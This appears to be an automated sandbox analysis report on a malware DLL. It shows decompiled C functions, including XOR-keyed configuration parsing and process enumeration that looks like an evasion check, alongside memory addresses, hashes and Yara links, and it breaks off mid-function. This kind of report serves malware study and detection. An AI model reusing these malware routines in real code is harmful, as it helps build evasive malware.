                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1d807357836c940b2a12cf31a712e6183425ef4ba7188cf3410d4df421dadf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6901D836B00204BAFF106FEADD80F7AB69AEB967E8F500036BF49D6050D7659C519B20
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F91262, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F91262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E02F99318(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E02F96BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x2f9d238, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}







                                                                                                                                                                                                                                    0x02f9126a
                                                                                                                                                                                                                                    0x02f912bf
                                                                                                                                                                                                                                    0x02f912c4
                                                                                                                                                                                                                                    0x02f9126c
                                                                                                                                                                                                                                    0x02f91286
                                                                                                                                                                                                                                    0x02f9128a
                                                                                                                                                                                                                                    0x02f9128f
                                                                                                                                                                                                                                    0x02f91291
                                                                                                                                                                                                                                    0x02f912a1
                                                                                                                                                                                                                                    0x02f912ad
                                                                                                                                                                                                                                    0x02f91293
                                                                                                                                                                                                                                    0x02f91293
                                                                                                                                                                                                                                    0x02f91296
                                                                                                                                                                                                                                    0x02f9129b
                                                                                                                                                                                                                                    0x02f9129b
                                                                                                                                                                                                                                    0x02f91291
                                                                                                                                                                                                                                    0x02f9128a
                                                                                                                                                                                                                                    0x02f912ca

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,80000002,76D7F710,?,?,76D7F710,00000000,?,02F9743A,?,004F0053,033E9388,00000000,?), ref: 02F912AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: b8638f7843b9126a83d7df30b07a0f565fce0e10bc92a63deb92ccfe78dbb3fa
                                                                                                                                                                                                                                    • Instruction ID: 0c0d11f8792459002bab31f14b754910ab401cab3051b15216e871e1184b8052
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8638f7843b9126a83d7df30b07a0f565fce0e10bc92a63deb92ccfe78dbb3fa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E011D3214024AFBEF22AF44CC01FAB7BAAEB947A0F558439FB199A160D731D521DF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F92436, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E02F92436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                                                                                                                                                                                                    0x02f92436
                                                                                                                                                                                                                                    0x02f92443
                                                                                                                                                                                                                                    0x02f92444
                                                                                                                                                                                                                                    0x02f92445
                                                                                                                                                                                                                                    0x02f9244c
                                                                                                                                                                                                                                    0x02f9247a
                                                                                                                                                                                                                                    0x02f9247b
                                                                                                                                                                                                                                    0x02f9247e
                                                                                                                                                                                                                                    0x02f92484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f92463
                                                                                                                                                                                                                                    0x02f9246d
                                                                                                                                                                                                                                    0x02f92474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f92465
                                                                                                                                                                                                                                    0x02f92468
                                                                                                                                                                                                                                    0x02f92488
                                                                                                                                                                                                                                    0x02f9246a
                                                                                                                                                                                                                                    0x02f9246a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9246a
                                                                                                                                                                                                                                    0x02f92468
                                                                                                                                                                                                                                    0x02f9248f
                                                                                                                                                                                                                                    0x02f92495
                                                                                                                                                                                                                                    0x02f92495
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 02F9247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                                                    • Opcode ID: a25982af68d48e2596969862668450d027eb2710217272c1c75c4c7b4f001b69
                                                                                                                                                                                                                                    • Instruction ID: 8f66d1e12fb7a40e7d77da60602bc90e6ca88923364df436992e25612d82e5fb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a25982af68d48e2596969862668450d027eb2710217272c1c75c4c7b4f001b69
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7EF01971D01219FBEF00DB98C588AEDB7B8EF05744F1080AAEA02A3102D3B45A44CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9A66E, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9A66E(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E02F97323(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E02F99039(_a4);
				}
				return _t13;
			}





                                                                                                                                                                                                                                    0x02f9a67a
                                                                                                                                                                                                                                    0x02f9a67f
                                                                                                                                                                                                                                    0x02f9a683
                                                                                                                                                                                                                                    0x02f9a68a
                                                                                                                                                                                                                                    0x02f9a695
                                                                                                                                                                                                                                    0x02f9a699
                                                                                                                                                                                                                                    0x02f9a699
                                                                                                                                                                                                                                    0x02f9a6a2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F97323: memcpy.NTDLL(00000000,00000090,00000002,00000002,02F9685F,00000008,02F9685F,02F9685F,?,02F9858C,02F9685F), ref: 02F97359
                                                                                                                                                                                                                                      • Part of subcall function 02F97323: memset.NTDLL ref: 02F973CF
                                                                                                                                                                                                                                      • Part of subcall function 02F97323: memset.NTDLL ref: 02F973E3
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000002,02F9685F,00000000,00000002,02F9685F,02F9685F,02F9685F,?,02F9858C,02F9685F,?,02F9685F,00000002,?,?,02F92417), ref: 02F9A68A
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3053036209-0
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: b2e07abb18055273021546b846b079f41fd234a6d698faa11137c897037cb2e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CE08672400228B6DF122A94DC00EEF7F5E8F416D1F004015FF4849200D621C9109BE1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 02F94094, Relevance: 9.2, APIs: 6, Instructions: 223memoryCOMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E02F94094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x2f9d278; // 0x63699bc3
				if(E02F98748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x2f9d2d4 = _v12;
				}
				_t25 =  *0x2f9d278; // 0x63699bc3
				if(E02F98748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x2f9d278; // 0x63699bc3
						_t31 = E02F93F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x2f9d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x2f9d278; // 0x63699bc3
						_t32 = E02F93F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x2f9d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x2f9d278; // 0x63699bc3
						_t33 = E02F93F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x2f9d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x2f9d278; // 0x63699bc3
						_t34 = E02F93F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x2f9d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x2f9d278; // 0x63699bc3
						_t35 = E02F93F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x2f9d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x2f9d278; // 0x63699bc3
						_t36 = E02F93F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E02F96ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E02F9A5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x2f9d278; // 0x63699bc3
						_t37 = E02F93F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E02F96ED2(0, _t37) != 0) {
						_t102 =  *0x2f9d32c; // 0x33e95b0
						E02F975E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x2f9d278; // 0x63699bc3
						_t38 = E02F93F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x2f9d27c; // 0x44a5a8
						_t18 = _t39 + 0x2f9e252; // 0x616d692f
						 *0x2f9d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E02F96ED2(0, _t38);
						 *0x2f9d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x2f9d278; // 0x63699bc3
								_t41 = E02F93F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x2f9d27c; // 0x44a5a8
								_t19 = _t42 + 0x2f9e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E02F96ED2(0, _t41);
							}
							 *0x2f9d340 = _t43;
							HeapFree( *0x2f9d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































                                                                                                                                                                                                                                    0x02f94094
                                                                                                                                                                                                                                    0x02f94097
                                                                                                                                                                                                                                    0x02f940b7
                                                                                                                                                                                                                                    0x02f940c5
                                                                                                                                                                                                                                    0x02f940c5
                                                                                                                                                                                                                                    0x02f940ca
                                                                                                                                                                                                                                    0x02f940e4
                                                                                                                                                                                                                                    0x02f942e2
                                                                                                                                                                                                                                    0x02f942e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f940ea
                                                                                                                                                                                                                                    0x02f940ea
                                                                                                                                                                                                                                    0x02f940f1
                                                                                                                                                                                                                                    0x02f94107
                                                                                                                                                                                                                                    0x02f940f3
                                                                                                                                                                                                                                    0x02f940f3
                                                                                                                                                                                                                                    0x02f94100
                                                                                                                                                                                                                                    0x02f94100
                                                                                                                                                                                                                                    0x02f94111
                                                                                                                                                                                                                                    0x02f94113
                                                                                                                                                                                                                                    0x02f9411d
                                                                                                                                                                                                                                    0x02f94122
                                                                                                                                                                                                                                    0x02f94122
                                                                                                                                                                                                                                    0x02f9411d
                                                                                                                                                                                                                                    0x02f94129
                                                                                                                                                                                                                                    0x02f9413f
                                                                                                                                                                                                                                    0x02f9412b
                                                                                                                                                                                                                                    0x02f9412b
                                                                                                                                                                                                                                    0x02f94138
                                                                                                                                                                                                                                    0x02f94138
                                                                                                                                                                                                                                    0x02f94143
                                                                                                                                                                                                                                    0x02f94145
                                                                                                                                                                                                                                    0x02f9414f
                                                                                                                                                                                                                                    0x02f94154
                                                                                                                                                                                                                                    0x02f94154
                                                                                                                                                                                                                                    0x02f9414f
                                                                                                                                                                                                                                    0x02f9415b
                                                                                                                                                                                                                                    0x02f94171
                                                                                                                                                                                                                                    0x02f9415d
                                                                                                                                                                                                                                    0x02f9415d
                                                                                                                                                                                                                                    0x02f9416a
                                                                                                                                                                                                                                    0x02f9416a
                                                                                                                                                                                                                                    0x02f94175
                                                                                                                                                                                                                                    0x02f94177
                                                                                                                                                                                                                                    0x02f94181
                                                                                                                                                                                                                                    0x02f94186
                                                                                                                                                                                                                                    0x02f94186
                                                                                                                                                                                                                                    0x02f94181
                                                                                                                                                                                                                                    0x02f9418d
                                                                                                                                                                                                                                    0x02f941a3
                                                                                                                                                                                                                                    0x02f9418f
                                                                                                                                                                                                                                    0x02f9418f
                                                                                                                                                                                                                                    0x02f9419c
                                                                                                                                                                                                                                    0x02f9419c
                                                                                                                                                                                                                                    0x02f941a7
                                                                                                                                                                                                                                    0x02f941a9
                                                                                                                                                                                                                                    0x02f941b3
                                                                                                                                                                                                                                    0x02f941b8
                                                                                                                                                                                                                                    0x02f941b8
                                                                                                                                                                                                                                    0x02f941b3
                                                                                                                                                                                                                                    0x02f941bf
                                                                                                                                                                                                                                    0x02f941d5
                                                                                                                                                                                                                                    0x02f941c1
                                                                                                                                                                                                                                    0x02f941c1
                                                                                                                                                                                                                                    0x02f941ce
                                                                                                                                                                                                                                    0x02f941ce
                                                                                                                                                                                                                                    0x02f941d9
                                                                                                                                                                                                                                    0x02f941db
                                                                                                                                                                                                                                    0x02f941e5
                                                                                                                                                                                                                                    0x02f941ea
                                                                                                                                                                                                                                    0x02f941ea
                                                                                                                                                                                                                                    0x02f941e5
                                                                                                                                                                                                                                    0x02f941f1
                                                                                                                                                                                                                                    0x02f94207
                                                                                                                                                                                                                                    0x02f941f3
                                                                                                                                                                                                                                    0x02f941f3
                                                                                                                                                                                                                                    0x02f94200
                                                                                                                                                                                                                                    0x02f94200
                                                                                                                                                                                                                                    0x02f9420b
                                                                                                                                                                                                                                    0x02f9420d
                                                                                                                                                                                                                                    0x02f94210
                                                                                                                                                                                                                                    0x02f94211
                                                                                                                                                                                                                                    0x02f94218
                                                                                                                                                                                                                                    0x02f9421a
                                                                                                                                                                                                                                    0x02f9421b
                                                                                                                                                                                                                                    0x02f9421b
                                                                                                                                                                                                                                    0x02f94218
                                                                                                                                                                                                                                    0x02f94222
                                                                                                                                                                                                                                    0x02f94238
                                                                                                                                                                                                                                    0x02f94224
                                                                                                                                                                                                                                    0x02f94224
                                                                                                                                                                                                                                    0x02f94231
                                                                                                                                                                                                                                    0x02f94231
                                                                                                                                                                                                                                    0x02f9423c
                                                                                                                                                                                                                                    0x02f9424a
                                                                                                                                                                                                                                    0x02f94254
                                                                                                                                                                                                                                    0x02f94254
                                                                                                                                                                                                                                    0x02f9425b
                                                                                                                                                                                                                                    0x02f94271
                                                                                                                                                                                                                                    0x02f9425d
                                                                                                                                                                                                                                    0x02f9425d
                                                                                                                                                                                                                                    0x02f9426a
                                                                                                                                                                                                                                    0x02f9426a
                                                                                                                                                                                                                                    0x02f94275
                                                                                                                                                                                                                                    0x02f94288
                                                                                                                                                                                                                                    0x02f94288
                                                                                                                                                                                                                                    0x02f9428d
                                                                                                                                                                                                                                    0x02f94293
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f94277
                                                                                                                                                                                                                                    0x02f9427a
                                                                                                                                                                                                                                    0x02f94281
                                                                                                                                                                                                                                    0x02f94286
                                                                                                                                                                                                                                    0x02f94298
                                                                                                                                                                                                                                    0x02f9429a
                                                                                                                                                                                                                                    0x02f942b0
                                                                                                                                                                                                                                    0x02f9429c
                                                                                                                                                                                                                                    0x02f9429c
                                                                                                                                                                                                                                    0x02f942a9
                                                                                                                                                                                                                                    0x02f942a9
                                                                                                                                                                                                                                    0x02f942b4
                                                                                                                                                                                                                                    0x02f942c0
                                                                                                                                                                                                                                    0x02f942c5
                                                                                                                                                                                                                                    0x02f942c5
                                                                                                                                                                                                                                    0x02f942b6
                                                                                                                                                                                                                                    0x02f942b9
                                                                                                                                                                                                                                    0x02f942b9
                                                                                                                                                                                                                                    0x02f942d3
                                                                                                                                                                                                                                    0x02f942d8
                                                                                                                                                                                                                                    0x02f942e5
                                                                                                                                                                                                                                    0x02f942e9
                                                                                                                                                                                                                                    0x02f942e9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f94286
                                                                                                                                                                                                                                    0x02f94275

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F94119
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F9414B
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F9417D
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F941AF
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F941E1
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,02F923DE,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F942D8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: 3e09933c7f91899a2ea8c59cd284eede9aaca375b098b62ae354d40d26040411
                                                                                                                                                                                                                                    • Instruction ID: 8a4294a5b0c21c7c2e780c25ca482bcf0c677b3ff7066fe8ea6830096019d44b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e09933c7f91899a2ea8c59cd284eede9aaca375b098b62ae354d40d26040411
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 346186B5F10108AAFF11EBB4DD84D5BB7EDABA86C47344E15E601E3204E731E5828F24
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9757F, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E02F9757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2f9d27c; // 0x44a5a8
						_t2 = _t9 + 0x2f9ee54; // 0x73617661
						_push( &_v264);
						if( *0x2f9d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                                                                                                                                    0x02f9758a
                                                                                                                                                                                                                                    0x02f97594
                                                                                                                                                                                                                                    0x02f97598
                                                                                                                                                                                                                                    0x02f975a2
                                                                                                                                                                                                                                    0x02f975d3
                                                                                                                                                                                                                                    0x02f975a9
                                                                                                                                                                                                                                    0x02f975ae
                                                                                                                                                                                                                                    0x02f975bb
                                                                                                                                                                                                                                    0x02f975c4
                                                                                                                                                                                                                                    0x02f975db
                                                                                                                                                                                                                                    0x02f975c6
                                                                                                                                                                                                                                    0x02f975ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f975ce
                                                                                                                                                                                                                                    0x02f975dc
                                                                                                                                                                                                                                    0x02f975dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f975dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f975d7
                                                                                                                                                                                                                                    0x02f975e3
                                                                                                                                                                                                                                    0x02f975e8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F9758F
                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 02F975A2
                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 02F975CE
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02F975DD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                    • Opcode ID: 583e991218719ce739f84295de5a76d380da4aacd8e843ec3e803813d1f70c4e
                                                                                                                                                                                                                                    • Instruction ID: 381e8a356ca8378f4e1975c18bed1a1d304216b6af758e8b72d970d5c374bcc5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 583e991218719ce739f84295de5a76d380da4aacd8e843ec3e803813d1f70c4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F09C72A091195BEF60B7768C48EEBB7ADDFC57D0F010051F705D3100EB24D959CA61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401850, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00401850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x404130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
